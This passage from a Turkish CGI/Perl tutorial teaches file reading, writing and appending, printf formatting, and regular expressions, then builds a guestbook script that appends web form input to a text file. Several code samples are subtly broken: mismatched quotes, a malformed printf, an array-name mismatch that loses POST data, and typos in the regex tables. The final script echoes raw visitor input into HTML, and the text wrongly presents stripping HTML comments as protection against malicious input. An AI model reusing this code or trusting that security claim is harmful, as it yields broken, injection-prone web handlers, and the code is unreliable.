    arasına aldığınız dosya tutamağının doğru olmaya devam etmesi demek, Perl’ün dosyada
    okunacak yazı kalmadığına karar vermesi demektir. Dosyada okunacak yazı kaldığı sürece,
    Dosya Girdi Operatörü dosyayı satır satır okuyacak ve her satırı $_ değişkeninin içine yazacaktır.
    Perl programımız ikinci adımda bu değişkeni ekranda görüntüleyecek ve yeniden while()
    döngüsünün başına dönecektir. Ve bu işlem, dosyada okunacak yazı kalmayıncaya (veya teknik
    deyimiyle dosya sonu işaretine [EOF] rastgelinceye kadar) bu işlem devam edecektir.

    Şimdi, buradaki örnekte Perl’ün okuduğu her satırı ya Perl’ün ya da bizim Tekil/Scalar değişkene
    koyduğumuza dikkat ediyor musunuz? Yani her yeni satır okunduğunda, bir önceki satır
    siliniyor! Oysa biz dosya işlemlerini çoğu zaman dosyanın tüm içeriğini alıp kullanmak amacıyla
    okutuyor olabiliriz. Acaba okunan her satırı bir dizi-değişkenin içine koyamaz mıyız?

    Neden olmasın? dosya02.pl’deki while() blokuna ait üç satırı silin ve yerine şu üç satırı yazın:

       @satirlar = <DOSYA>;

       print @satirlar;    Bu kez dosyayı dosya03.pl adıyla kaydedin ve Browser’da açın. Yine dosyanın tüm içeriğini
    görüyor olmalısınız.

    Bu kez, okuttuğunuz dosya kaybolmadı; hepsi @satirlar değişkeninin içinde duruyor. Şimdi size
    bir pop quiz!

    1. @satirlar’ın kaç elemanı var?

    2. Bu elemanları tek tek nasıl görüntüleyebilirsiniz?

    (Bu soruların cevabı, bu kitapçığın materyalini oluşturan zip dosyasında, popquiz.pl dosyasında
    bulunabilir.)


CGI / Perl                                            81
Dosyaya Yazdıralım


    Perl’ümüz bayağı gelişiyor; önce dosya açmayı öğrendi; sonra okumayı. Şimdi sıra yazmada!
    Böylece okur-yazar bir Perl’ümüz olacak.

    Aslına bakarsanız, Perl’ye baştan beri print() fonksiyonu ile “yazdırıyoruz!” Bu ana kadar bu
    fonksiyonun ekranda (veya doğru değimiyle, Browser penceresinde) yazmasını sağladık; şimdi
    bu işlemi diskteki bir dosyaya yapmasını sağlayacağız. Bu işlemi bir dosya açtırarak, ve print()
    fonksiyonunu bu dosyanın tutamağına (Handle’ına) yönlendirerek yapabiliriz. Örnek:

    open (CIKTI, ‘>yazilan_dosya.txt)’;

    print CIKTI “Bu bir örnek satır\n”;

    Bu program, ekranda hiç bir şey görüntülemez; ancak kendi çalıştığı (bulunduğu) dizinde
    “yazilan_dosya.txt” adında bir dosya oluşturarak, içine “Bu bir örnek satır” yazar. Bu programı
    çalıştırdıktan sonra oluşturulan dosyayı açarsanız, içinde bu satırın sonuna yeni satır kodunun
    da girilmiş olduğunu görürsünüz. Programı çalıştırdığınız anda, Perl, işletim sistemine, böyle bir
    dosya bulunup bulunmadığını ve varsa, açıp içindekileri değiştirme yetkisi bulunup
    bulunmadığını sorar.

    İşletim sistemi, böyle bir dosya varsa salt okunur olup olmadığına ve Web’de paylaşım izni
    bulunup bulunmadığına bakar. Dosya salt okunur değilse ve paylaşılabilir nitelikte ise işletim
    sistemi Perl’e dosyayı açması ve içeriğini değiştirmesi için izin verir. Değilse, Perl size hata
    mesajı ile acıklı durumu bildirir. (Bir Web Server’da Web sitenizdeki dosyaların okuma-yazda ve
    çalıştırma izinlerini nasıl düzenleyebileceğinizi son bölümde göreceğiz.) Yazdırmak istediğiniz
    dosya yoksa ve sizin kullanıcı olarak böyle bir dosya oluşturma hakkınız varsa, Perl önce dosyayı
    oluşturur; sonra da içine istediğiniz yazıyı yazar.

    Okumak için dosya açma alıştırmasında olduğu gibi, yazdırma amacıyla açacağınız dosyalarla
    ilgili olarak da programınıza hata yakalama subrutini (fonksiyonu) koymalısınız.

    Peki, hazır dosya yazdırmayı öğrenmişken, biraz uzunca bir şeyler yazdıralım. Örneğin:

    open (CIKTI, ‘>yazilan_dosya.txt)’;

    for ($i = 998; $i < 1102; $i += 1) {

    print CIKTI “$i\n”;

    }

    Bu programın oluşturduğu dosyayı açtığınızda muhtemelen şöyle bir dizi göreceksiniz:

    998

    999


CGI / Perl                                            82
    1000

    1001

    1002

    Oysa biz genellikle bu tür listelenen bilgilerin sağa hizalanmasını isteriz. Örneğin:

           95

           998

           999

          1000

          1001

          1002

////////////////////SAYFA TASARIMI İÇİN NOT://///////////////

    Yukarıdaki birinci listedeki sayılar sola blok; ikinci listedeki sayılar sağa blok olacak.

/////////////////NOT BİTTİ/////////////////

    Perl’e, ekrana veya dosyaya bu tür biçimlendirilmiş (formatted) veri yazdırma işlemini printf()
    fonksiyonu ile yapabiliriz. Bu fonksiyon, Perl’ün biçimlendirme argümanlarını kullanır.

    /////////////////KUTU//////////////////////////////////

Perl’de String Biçimlendirme


    printf() fonksiyonu ile ekrana veya dosyaya String yazdırırken, uygulanan yazım kuralı şöyledir:

    printf(BİÇİM, LİSTE);

    Örnek:

    printf(“%.2F”, $Degisken);

    Biçim argümanının elemanları şöyle sıralanır:

    1. Biçim argümanının başladığını belirten yüzde (%) işareti

    2. İşaret: Biçim argümanı beş ayrı işaret alabilir:

             +    Yazılan String’in önünde artı (+) veya eksi (+) işareti olmasını sağlarCGI / Perl                                              83
             -    String’in sola hizalanmasını sağlar

             0    Sayının soluna boşluk değil sıfır konulmasını sağlar

             #    Heksadesimal sayılarda sola 0x veya 0X; Octal sayılarda sayıdan önce 0
                 konmasını sağlar.

           boşluk   Pozitif sayıların önüne bir aralık konarak, negatif sayılarla hizalanmasını
                 sağlar.

    3. Çıktı alanının asgarî boyutu.

    4. Çıktının kaç basamaklı olacağı: bir nokta bir sayı ile yazılır.

    4. Çıktı alanının türü. 15 çıktı alanı türü tanımlanabilir.

        s    String

        d    Integer, tam sayı

        f    Real, gerçek sayı

        g    Campact Real, sıkıştırılmış gerçek sayı

        u    Unsigned integer, işaretlenmemiş tam sayı

        x    Hexadecimal sayı (16-tabanlı, küçük harfle)

        X    Hexadecimal sayı (16-tabanlı, büyük harfle)

        o    Octal (8-tabanlı)

             e    Scientific notation (10’un kuvveti olarak yazılmış sayı, küçük harf)

             E    Scientifc notation (10’un kuvveti olarak yazılmış sayı, büyük harf)

        c    Single character (8-bit’lik karakter, değer olarak)

        ld    Long integer (32-bit’lik tam sayı)

        lu    Long unsigned integer (32 bit(lik işaretlenmemiş tam sayı)

        lx    Long hexadecimal (32-bit’lik 16-tabanlı sayı)

        lo    Long octal (32-bit’lik 8-tabanlı sayı)

Perl ile String biçimlendirmek kolay değildir. Perl’ün çeşitli işletim sistemleri için geliştirilmesi işini
sürdüren kurum ve kuruluşların sitelerinde örnek String’ler ve sayılar üzerinde biçimlendirmenin hasıl
yapıldığını gösteren Perl programları vardır. Bu dosyalar örnek olarak kullanılabilir. Bu kitapçığın örnekCGI / Perl                                             84
kodları arasında bulacağınız bicim.pl dosyasını çalıştırarak, biçimlendirme argümanlarının nasıl
kullanıldığını inceleyebilirsiniz. Bu programda “PCWorld” String’ine, 5.242984 ve 2553 sayılarına değişik
biçimlendirme argümanları ile verdiğimiz farklı şekilleri burada görüyorsunuz:

<cgi-perl015.tif>

Örneğin, “PCWorld” String’inin “PCW” olarak biçimlendirilmesi için şu programı verebilirsiniz:

$Metin1 = “PCWorld”;

printf(“%.3s\n”, $Metin1);

////////////////////////////KUTU BİTTİ//////////////////////

Yukarıdaki sayı dizinin sağa hizalanmış olarak yazılmasını sağlamak için printf() fonksiyonunu şöyle
yazabiliriz:

    open (CIKTI, ‘>yazilan_dosya.txt)’;

    for ($i = 998; $i < 1102; $i += 1) {

    printf(CIKTI “%4d, $i\n”;

    }

Bu komutla rakamlarımıza asgarî dört basamaklı yer ayırtıyoruz ve tam sayı olarak yazadırıyoruz. Bu
programla Perl, bütün rakamlarınızı sağa hizalayacaktır.

//////////////////KUTU///////////////////////////////

Yazdırmış olsa idik!


Perl’ün sprintf() fonksiyonu aynen printf() gibi çalışır; fakat dosyaya veya ekrana yazdıracağı veriyi
istediğiniz bir değişkene değer yapmak üzere bize getirir.

    $degisken = sprintf(“%4d, $i\n”);

deyimi ile tıpkı dosyaya yazılacak olan satırı $degisken’in değeri yapabiliriz.

//////////////////////////KUTU BİTTİ//////////////////////////

Dosyaya Ek Yapalım


Perl açısından bir dosyaya yazmakla, bir dosyanın sonuna metin eklemek arasında yapacağımız işlemler
açısından hiç bir fark yoktur; sadece dosyanın açılışında fark vardır. Fakat bu çok önemli fark: Yazmak
CGI / Perl                                             85
için açtığınız dosya varsa, varolan içeriği tümüyle değiştirilir; eklemek için açtığınız dosya yoksa
oluşturulur; varsa yazdırmak istediğiniz metin en sona eklenir. Burada tekrar edelim:

Yazmak için dosya açma fonksiyonu:

    open (YAZ, “>yazilacak_dosya.txt”);

Eklemek için dosya açma fonksiyonu:

    open (EKLE, “>>eklenecek_dosya.txt”);

Bir kere daha vurgularsak, yazmak için dosya adının önünde tek büyüktür (>) işareti, eklemek için iki
büyüktür (>>) işareti kullanıyoruz. Bu minicik işaretin işlevi arasındaki fark; aylardır biriktirdiğiniz
ziyaretçi defteri girdilerinin tümünün silinip, yerine son ziyaretçinin girdilerinin yazılması olabilir!

Gerçek Form.. Gerçek Perl


Eh, artık Perl ile bir Form’daki bilgileri alıp, bir dosyaya yazdıracak düzeye geldik. Şimdi Web sitemize bir
konuk defteri koyalım; bunun derleyeceği bilgileri ziyaretçiye onaylattırdıktan sonra bir dosyaya
eklettirelim. Son bölümde, gerçek CGI ortamının kurallarını biraz daha yakından tanıdıktan sonra Perl
programımıza, bize, bir ziyaretçinin daha konuk defterini doldurduğunu belirten bir elektronik mektup
göndermesini öngören küçük bir bölüm daha ekleyeceğiz,

Kitapçığın baş tarafında “Sizi tanıyabilir miyiz?” başlıklı bir form yapmıştık ve bunu form.htm adıyla
kaydetmiştik. Şimdi o dosyayı Form’un ACTION hanesine yazdığımız Perl programının adını değiştirmek
amacıyla açın. Hatırlayacaksınız, o Form için yazdığımız Perl programı sadece Form’daki bilgileri
Standart Girdi (STDIN) yoluyla okuyor ve bunları Browser penceresinde görüntülüyordu. Form’un
ACTION hanesini şöyle değiştirin ve dosyası form2.htm adıyla kaydedin.

Aşağıda kısa bir şekilde Perl’de arama-bulma-değiştirme işlemlerine değineceğiz. Bu bölümde yer alan
alıştırmalardan sonra forn_analiz.pl’i açın ve form_islem.pl adıyla kaydedin; birazdan bu programın
içeriğini değiştereceğiz. Önce, gözden geçirmeyi elimizde işlenecek bir metin oluncaya kadar geri
bıraktığımız bir iki metin arama-değiştirme fonksiyonunu ele alalım.

Bul-Değiştir

Başkasının yazdığı metinlerde noktalama işaretlerinden sonra boşluk bırakılmamış olmasına kızar
mısınız? Ben de! Perl ile metin düzenleme fonksiyonlarından geriye bıraktığımız ikisi, vereceğimiz bir
String modelini (pattern) metinde arayan ve bulduklarını değiştiren fonksiyonlarla, Perl’e okuttuğumuz
metinlerde sadece yazım kurallarını uygulatmakla kalmayız, fakat Form bilgisi içinde sitemizin
güvenliğini sarsıcı metin olup olmadığını tarayabiliriz; gereksiz karakterleri, örneğin yeni satır başlatan
kodları atabiliriz.
CGI / Perl                                               86
Perl’ün içinde arama işlemi de bulunan split() fonksiyonunu daha önce görmüştük. Bu fonksiyona,
arayacağı nesneyi iki bölü işareti (//) arasında veriyorduk; hangi değişkende aramay yapılmasını
istediğimizi bildiriyorduk; elde ettiği sonuçları yeni bir değişkene yazmasını istiyorduk. Örneğin:

@Yeni_degisken = split(/\&/, $Aranan_degisken);

Bu deyimle, Perl, $Aranan_degisken adlı değişkenin içinde, & işaretlerini bulur ve değişkeni &
işaretlerinden parçalara böler; elde ettiği her bir parçayı @Yeni_değişken adlı değişkenin elemanları
olarak yazar.

Perl’ün arama-bulma işi yapan bir diğer işlemcisi benzerini-bul (match) “m//” operatörüdür. Dikkat
ederseniz fonksiyon değil, operatör (işlem) diyoruz. Çünkü, bu işlem tek başına değil, Perl bir diğer
işlemi, “bağdaştırma/bağlama işlemi” (binding operator) dediğimiz =~ işareti ile birlikte kullanılır ve bize
doğru/yanlış sonucunu verir. Bağlama işareti, solunda değerin içinde sağındaki “modelin” bulunup
bulunmadığını bildir. Burada sağdaki model m// ile belirtilir. Örnek yapalım, bu karmaşık ifade anlaşılır
hale gelecektir:

if(“dostlar#neredesiniz” =~ m/#/)

{print “Aranan bulundu\n” } else {print “Aranan bulunamadı\n” }

Ekrana “Aranan bulundu” yazdıracaktır. (“dostlar#reredesiniz” String’i yerine isterseniz bir değişken adı
da koyabilirsiniz; arama değişkenin içerdiği değerde yapılır.) Buradaki “if” doğru/yanlış sonucu veren bir
operatör doğru sonuç verdiği zaman birinci işlemi, yanlış sonuç verdiği zaman ikinci işlemi yapacaktır.
Arama sonucu arananın benzeri bulunamazsa, sonucun yanlış değil doğru olması için bağlama
operatörünü !~ olarak yazabiliriz. Örnek:

if(“dostlar#neredesiniz” !~ m/#/)

{print “Aranan bulunamadı\n” } else {print “Aranan bulundu\n” }

Metinlerinizde, Perl için özen anlamı olan şu karakterleri aratmak istiyorsanız, iki bölü işaretinin arasına
bu karakteri yazarken önüne ters-bölü işareti koymanız gerekir:

^$+*?.|(){}[]\/

Bir metinde iki karakterden biri veya diğerini aratacağınız zaman veya anlamına gelen dik çizgi (|)
işaretini kullanmanız gerekir. örneğin, Perl aranan metinde “h” veya “H” harfini arasın istiyorsak, bunu
şöyle yazabiliriz:

if($aranan_metin =~ m/(h|)/)..

m// operatörü ile joker karakterler de kullanabilirsiniz:

if($aranan_metin =~ m/T.K/)..
CGI / Perl                                             87
Perl, TEK, TAK, TÜK kelimelerini bulacak fakat mesela TANK kelimesini bulmayacaktır; çünkü bir adet
nokta işareti ile verdiğiniz iki karakterin arasında sadece bir adet karakter bulunmasına izin verdiniz.
Perl’de aranan modeli belirtmek için bir çok başka yöntem vardır. Örneğin verdiğiniz modelin
bulunmasını değil, bulunmamasını istiyorsanız, önüne ^ işareti koyabilirsiniz. Bir başka örnek, bütün bir
sınıfı belirtmek amacıyla aranan modeli köşeli parantez içine almak veya dizileri, 0-9, A-Z, a-z gibi kesme
işaretiyle belirtmek olabilir. Fakat bunların çoğunun kısayolu da vardır:

Kısayol     Açık şekli        Anlamı

     \d     [0-9]            Herhangi bir rakam

\w          [a-zA-Z_0--]         Herhangi bir alfanümerik karakter

\s          [\t\n\r\f]          Herhangi bir yazılmaz karakter

\D          [^0-9]            Rakam olmayan bir karakter

\W          [^a-zA-Z_0--]        Alfanümerik olmayan bir karakter

\S          [^\t\n\r\f]         Yazılmaz olmayan bir karakter

Bu kısayolların kullanımına bir örnek verirsek:

if($aranan_metin =~ m/\d/)..

deyimi ile metinde herhangi bir rakam bulunup bulunmadığını aratabilirsiniz. Kısayollar ve normal
ifadeler birlikte kullanılarak, Perl’ün arama yeteneği genişletilebilir.

Bazen arattığımız karakter(ler)in metindeki yeri bizim için önem taşıyabilir. ^ işareti vereceğimiz
karakterlerin aranan metnin başında, $ işareti de sonunda olmasına dikkat edilmesini sağlar. Örnek,
aradığımız metni “Mus” harfleriyle başlamasını istiyorsak:

if($aranan_metin =~ m/^Mus)..

Aranan metnin “afa” ile bitmesini istiyorsak:

if($aranan_metin =~ m/afa$)..

Bu noktada eğer temizlemediyseniz, bir dosyadan okuttuğunuz metnin sonunda yeni satır karakteri
bulunabileceğini hesaba katmalısınız. Perl’ün aranan karakterin kaç adet olması gerektiğini
belirleyebilmemizi sağlayan kısayollar vardır:

Kısayol     Anlamı

     +     En az 1 kere veya daha fazla

*          En az 0 kere veya daha fazla

?          0 veya 1 kere


CGI / Perl                                            88
{x}          Kesinlikle x kere

{x,}         En az x kere

{x,y}         En az x, en çok y kere

Bu kısayollar da diğer normal ifadeler ve kısa yollarla birlikte kullanılabilir. Örneğin, “H ile başlayan ve I
ile biten ve arasında bir veya daha fazla herhangi bir karakter bulunan metinleri bul!” demek
istiyorsanız, şu deyimi yazmalısınız:

if($aranan_metin =~ m/H.+I)..

Bu deyimle, HAKKI ve HALI bulunur, fakat HI bulunamaz.

Aradığımızı bulduk, diyelim. Elde ettiğimiz sonuç aranan bulunursa doğru (True), bulunamazsa yanlış
(False) değerinden başka bir şey değil. Peki, içinde aradığımız değer bulunan String’i veya sayıyı
öğrenemez miyiz? Öğreniriz. Perl bulduklarını sırayla $1, $2, $2 adlı değişkenlere yazar. Örnek:

$Metin1 = “HAKKI”;

if($Metin1 =~ m/(H.)K(.I)/)

{print “Bulundu\n” } else {print “Bulunmadı\n” }

print “$1\n$2\n”;

Prel’ün aradığı metnin büyük-harf veya küçük-harf olmasına aldırış etmemesini istiyorsak, m//
işleminden sonra i (ignore) harfini koyarız. Arattığımızı arama yapılan metinde bütün geçtiği yerlerde
bulmasını istiyorsak, yani arama yapılan metnin tümünün aranmasını arzu ediyorsak, m//
operatöründen sonra g (global) harfini koyarız.

Peki, aradığımızın sadece bulunup bulunmadığını ve ne bulunduğunu öğrenmek istemiyoruz; fakat
aradığımız şeyi değiştirmenizi istiyorsak! Bunu s/// işlemine (substitute, yerine koy) ile yaparız. Çalışma
ilkesi tamamen m// işlemkine benzeyen s///, ikinci ve üçüncü bölü işaretleri arasına koyacağımız
şeyleri, bulduklarının yerine koyar.

Sözgelimi elimizdeki metinde geçen bütün + işaretlerini boşluk (aralık) ile değiştirmek istiyoruz:

$Bosluklu_degisken = ($Artili_degisken =~s/\+/ /);

s/// işleminin de işleyişini değiştiren bir çok eki vardır. Bundan e (evaluate, değerlendir), eğer bulunan
unsurun yerine konulan unsur bir hesap veya bir değişken içeriyorsa, bu değerlendirmenin yapılmasını
sağlar.

$yeni_degisken =~ s/\d+/$1 + 1/e;

Perl, bu deyimle, bulduğu unsur diyelim ki 135 ise, anında 136 yapar.
CGI / Perl                                              89
Her ne kadar kullanışlı olsa da, s/// işlemi sadece bir unsuru bir başka unsura çevirdiği için, bazen
yetersiz kalabilir. Bize bütün değişkende, söz gelimi bütün büyük harfleri küçük harf yapacak, bir işlemci
gerekebilir. Bu işlemci, tr/// operatörüdür. Ve işte arzu ettiğimiz büyük harf-küçük harf değişlikliğini
yapma deyimi:

$yeni_degisken =~ tr/A-Z/a-z/;

Bu işlemin işleyiş tarzını ve sonuçlarını, üç şekilde değiştirebiliriz:

c: seçilmeyenleri değiştir:

$yeni_degisken =~ tr/0-9/ /c;

Bu deyim, rakam olmayan herşeyin yerine boşluk koyar.

d: değiştirme, sil:

$yeni_degisken =~ tr/0-9//cd;

Bu deyim, rakam olmayan herşeyi siler.

s: tekrar edenleri teke düşür:

$yeni_degisken =~ tr/,/,/s;

Bu deyim, yanyana birden fazla virgülü tek virgül haline getirir.

Form’dan gelen bilgilerde arama-bulma-değiştirme

Perl’de arama-bulma-değiştirme işlemlerini gözden geçirmeyi de tamamladıktan sonra, bir Form’dan
gelen veriyi istediğimiz biçimde kullanılır hale getirmek için herşeyi öğrenmiş olduk. Şimdi
forn_analiz.pl’i açın ve form_islem.pl adıyla kaydedin; ve programın baş tarafındaki şu deyimlere bakın:

 ................

     @girdiler = split(/&/, $ENV{'QUERY_STRING'});

 ................

     @girdi = split(/&/, $depo);

 ................

     ($anahtar, $deger) = split (/=/, $girdi);

     $anahtar =~ tr/+/ /;

     $deger =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

     $deger =~ tr/+/ /;CGI / Perl                                            90
     $deger =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

     $deger =~s/<!--(.|\n)*-->//g;

 ................Bu programı yazdığımızda içinde anlamadığımız şeyler bulunduğunu belirtmiştik; şimdi anlaşılmayan bir
taraf kalmamış olsa gerek. Browser’ın yumak yapıp yolladığı Form bilgilerini içine yazdığımız $depo adlı
değişkenin değerini & işaretinden bölümlere ayırdığımızı, ortaya çıkan bütün parçaları, @girdi dizisinin
elemanları haline getirdiğimi ve sonra bu dizinin her bir satırını bu kez eşittir işaretinden bölüp, ortaya
çıkan Stringleri bu kez %formveri adlı Bağlantılı Dizi (Hash) değişkenin anahtar/veri çiftleri olarak
kaydettiğimi görüyorsunuz.

Şimdi bu işlemin arasında, hem anahtar adı olacak String’de, hem de değer olacak String’de önce +
işaretlerini boşlukla değiştirdiğimizi; sonra biraz karışıkça bir deyimle, s/// işlemi yaptırdığımızı
görüyorsunuz:

=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

Aslında bu s/// işleminin arama bölümünü biliyoruz: “değeri a-f veya A-F ve 0-9 arasında olan iki
basamaklı ve % ile başlayan herşeyi bul.” Fakat bulunan şeyin yerine konacak değer yabancı. Perl’ün
paket denilen haricî araçlar dosyaları (externel utilities files) vardır. Bu paketler (modüller) Perl ile
birlikte kurulur ve Perl programlarınızı çalıştıran Perl Programı tarafından tanınır. Burada gönderme
yaptığımız “C” paketi 16 tabanlı sayı sistemiyle yazılmış kodların ASCII, ANSI ve Unicode karşılıklarını
verir.

Yukarıdaki örnekte yer alan son s/// işlemi Web Form verisi yoluyla sitenize zararlı program kodu
yollamak isteyebileceklere karşı alınmış bir önlemdir. Kötüniyetli kişi HTTP Server’a zararlı programları
“<!---“ ve “-” işaretleri arasında yollamak zorundadır. Bu işlemle bu tür girdileri tümüyle yok ediyoruz.

Bu örnekte gördüğünüz tr/// ve s/// işlemlerini içeren deyimler, neredeyse bütün dünyada standart
olarak kullanılır. Form işleme programında da bu bölümü aynen bırakacağız.

Yapacağımız ilk değişiklik, ekrana gönderdiğimiz değişiklikleri bu kez bir dosyaya göndermek olacağı için
Perl programına geçmeden önce bu dosya ile ilgili hazırlıklar yapalım. Bu dosyada, ziyaretçilerimizden
gelen bütün Form bilgileri belirli bir biçimde yazılması gerekir, ki sonra bu dosyayı Web Sitemize
evsahipliği yapan bilgiyardan kendi bilgisayarımıza çekerek, inceleyebilelim, ziyaretçilerimiz hakkında
fikir edinelim. Bu dosyadaki bilgilerin, Form’daki Input alanlarını sütun olarak düşünerek kaydedilmesi
uygun olur. Bunun için önce içine Form bilgilerinin ekleneceği düzyazı dosyasını oluşturabiliriz, birinci
satır olarak sütun başlıklarını yazabiliriz. Örneğin şöyle:

Adı     Adres     Kod     Merak     e-posta      mesaj      eğitim

Burada sütun başlıklarından sonraki ok işaretleri kelimelerin arasına sekme (Tab) koyduğumuzu
gösteriyor. Form bilgilerimizi de değişken değerlerinin arasına sekme koyarak yazacağız. Şimdi bu


CGI / Perl                                             91
dosyayı form_bilgileri.txt adıyla kaydedin. İsterseniz bu dosyayı daha sonra düzyazı programıyla değil bir
veritabanı programı ile açabilirsiniz; sekme ile ayrılan metinler sütun haline dönüştürülür. (Bu
alıştırmayı birlikte yapıyorsak, “eğitim” kelimesinden sonra Enter tuşuna basarak yeni satır (newline)
kodu girmeyi unutmayın!)

Eğer hala yapmadıysanız, şimdi form_analiz.pl dosyasını düz yazı programınızda açın ve form_islem.pl
adıyla kaydedin. Bu programın yaptığı iki iş var: (1) Form’dan gelen bilgileri %formveri değişkenine,
Input alan adları anahtar, ziyaretçinin bu alana yazdıkları değer olarak şekilde yerleştirmek; sonra bir
dizi print() fonksiyonu ile bunları ekranda görüntülemek. Yukarıda görmüştük ki, ekrana “yazdırmak” ile
dosyaya “yazdırmak” arasında sadece bir dosya tutamağı farkı vardı. Hatırlarsak, dosya tutamağı
(handle) dediğimiz şey, dosyayı açtığımız sırada verdiğimiz keyfî bir kelimeden ibaretti.

Demek ki önce Perl’e, biraz önce oluşturduğumuz ve Web sitemizde form_isleme.pl programının
bulunduğu dizine gönderdiğimiz dosyayı ek yapılmak üzere açalım. (Şimdilik bu dosyayı kişisel Web
Server’da Perl program dosyalarınızın durduğu dizine kopyalamakla yetineceğiz; fakat gerçek CGI
yönetimi ile ilgili bilgileri ve bu dosyayı FTP ile HTTP Server’ına göndermeyi bundan sonraki bölümde ele
alacağız.)

    open (EKLE, “>>form_bilgileri.txt”);

Bu deyimle, biraz önce oluşturduğumuz ve tek satırlık sütun başlıklarımızı eklediğimiz metin dosyasını
ek yapmak amacıyla açıyoruz; ve bu dosyaya EKLE tutamağını (Handle) veriyoruz.

Şimdi artık, Form’dan gelen bilgileri (%formveri değişkenindeki değerleri) bu dosyaya kaydedebiliriz.
Fakat bu noktada dikkatinizi bir duruma çekmek istiyorum. Elimizi alıştırmak amacıyla yazdığımız için bu
form_analiz.pl programında ziyaretçiden gelen verileri içeriklerine çok dikkat etmeden, tümüyle işledik
ve ve “herşeyi” ekrana gönderdik. Bu arada Form etiketinin otomatik olarak gönderdiği “Gonder”
düğmesinin (aslında düğmenin üzerine yazılan metinden başka bir şey olmayan) değeri de %formveri
değişkeninde “Gonder” anahtarına “Gönder” değeriylle kaydedildi. Acaba, hiç bir işimize yaramayacak
bu bilgi dosyaya kaydettirmemek mümkün müdür? Tabiî. Şu anda ekrana “yazma” işini yapan print()
fonksiyonunun nasıl işlediğini hatırlayalım:

foreach $anahtar (sort keys(%formveri)) {

print "<P><B>$anahtar</B> alanına <B>$formveri{$anahtar} </B>değeri
girildi.";

}

%formveri değişkeninin her bir anahtarı için, ekrana anahtar adı ile “alanına” kelimesini, anahtarın
değerini ve “değeri girildi” kelimelerini yazdırıyoruz. Yazdırdığımız anahtarın “Gonder” değerine eşit
olması halinde bu yazma işlemini yaptırmayabiliriz. Veya, tersini:

foreach $anahtar (sort keys(%formveri)) {

if ($anahtar ne “Gonder”) {


CGI / Perl                                            92
print "<P><B>$anahtar</B> alanına <B>$formveri{$anahtar} </B>değeri
girildi.";

}

}

Perl, print() fonksiyonunu ancak ve sadece elindeki anahtarın “Gonder” olmaması (ne, Stringler için eşit
değilse anlamına gelir) halinde icra edecektir. (Aynı amacı başka yöntemlerle de sağlayabiliriz. Gönder
düğmesinin oluşturduğu değeri %formveri değişkenine yazdırmamayı başarabilir misiniz?)

Peki, Gönder düğmesinin değerini yazdırmamayı başardık; fakat oluşturmak istediğimiz form bilgileri
dosyasında anahtar adlarına ihtiyacımız var mı? Anahtarları sütun başlığı olarak dosyaya yazdık; şimdi
artık ziyaretçilerin verdiği bilgileri işlerken anahtarları değiş sadece değerleri, aralarına sekme (Tab)
işareti koyarak yazdırabiliriz. Bunu mevcut kodda uygulayalım:

foreach $anahtar (sort keys(%formveri)) {

if ($anahtar ne “Gonder”) {

print EKLE "$formveri{$anahtar}\t";

}

}

print EKLE "\n";

Burada EKLE tutamağı ile tanınan açık dosyaya (form_bilgileri.txt) sadece %formveri ilişkili değişkeninde
sırasıyla bütün anahtarların değerlerini, bir sekme (Tab) işaretiyle yazdırıyoruz. Bir ziyaretçinin form
bilgilerinin işlenmesi bittiğinde, yani bu ziyaretçiye ait son veri de yazdırıldıktan sonra, satırın sonuna
yenisatır (newline) işaretini yazdırıyoruz, ku böylece bir bayşka ziyaretçi için bu dosyaya ek yapılırken,
yeni bilgiler yeni bir satırdan başlayabilsin.

Böylece ziyaretçiden aldığımız bilgileri işlediğimiz dosya ile işimiz tamamlanmış oluyor; açtığımız dosyayı
kapatabiliriz:

close (EKLE);

Bu arada, ziyaretçimize bir teşekkür mesajı vermeyi unutmalayım. Bunu, ziyaretçinin bilgisayarına HTML
kodlarıyla mesajımızı yazdırarak yapabiliriz.

Teşekkür bölümüyle birlikte form_isleme.pl şu şekli almış oluyor:

  #!/usr/local/bin/perl

  #form_islem.pl
CGI / Perl                                            93
 if ($ENV{'REQUEST_METHOD'} eq 'GET') {

     @girdiler = split(/&/, $ENV{'QUERY_STRING'});

 } elsif ($ENV{'REQUEST_METHOD'} eq 'POST') {

     read (STDIN, $depo, $ENV{'CONTENT_LENGTH'});

     @girdi = split(/&/, $depo);

 } else {

     print "Content-type: text/html\n\n";

     print "<P>Formda bir hata var!";

 }

 foreach $girdi (@girdiler) {

     ($anahtar, $deger) = split (/=/, $girdi);

     $anahtar =~ tr/+/ /;

     $deger =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

     $deger =~ tr/+/ /;

     $deger =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

     $deger =~s/<!--(.|\n)*-->//g;

     if ($formveri{$anahtar}) {

       $formveri{$anahtar} .= ", $deger";

     } else {

       $formveri{$anahtar} = $deger;

     }

 }

 #dosya ekleme bölümü

 open (EKLE, “>>form_bilgileri.txt”);

 foreach $anahtar (sort keys(%formveri)) {

     if ($anahtar ne “Gonder”) {

       print EKLE "$formveri{$anahtar}\t";

       }
CGI / Perl                               94
     }

 print EKLE "\n";

 close(EKLE);

 #teşekkür bölümü

 print "Content-type: text/html\n\n";

 print "<meta http-equiv=\"content-type\" content=\"text/html; charset=ISO-
 8859-9\">\n";

 print "<meta http-equiv=\"Content-Type\" content=\"text/html;
 charset=windows-1254\">\n";

 print "<H3><CENTER>Teşekkürler</CENTER></H3>\n";

 print "<P>Sayın $formveri{Adi}\n";

 print "<BR>$formveri{Adres} $formveri{Kod}\n";

 print "<P>Sitemizi ziyaret ettiğiniz ve formumuzu doldurduğunuz için size
 teşekkür ederiz!\n";

 print "<BR>Size $formveri{Merak} alanında daha iyi hizmet etmek için çaba
 göstereceğiz.\n";

 print "<BR>Adýnýzý ve<B> $formveri{eposta} </B>şeklindeki elektronik
 adresinizi tanesi 250 bine kimseye satmayacağımıza söz veriyoruz.\n";

 print "<P>Ana sayfamıza geri dönmek için burayı <A
 HREF=\"index.htm\">tıklayınız</A>.\n";İşte bu kadar! Ziyaretçinizden sitenizdeki bir Form’a yazdığı ve size gönderdiği bilgileri bir dosyaya
eklettirmeyi başarmış bulunuyorsunuz. Bu dosyadaki bilgilerle ziyaretçilerinizi daha yakından tanımak,
sitenizi bırakılan mesajlar doğrultusunda zenginleştirmek, ve sitende yaptığınız güncelleştirmeleri
derlediğiniz elektronik posta adreslerine düzenli şekilde bildirmek size kalmış bulunuyor.
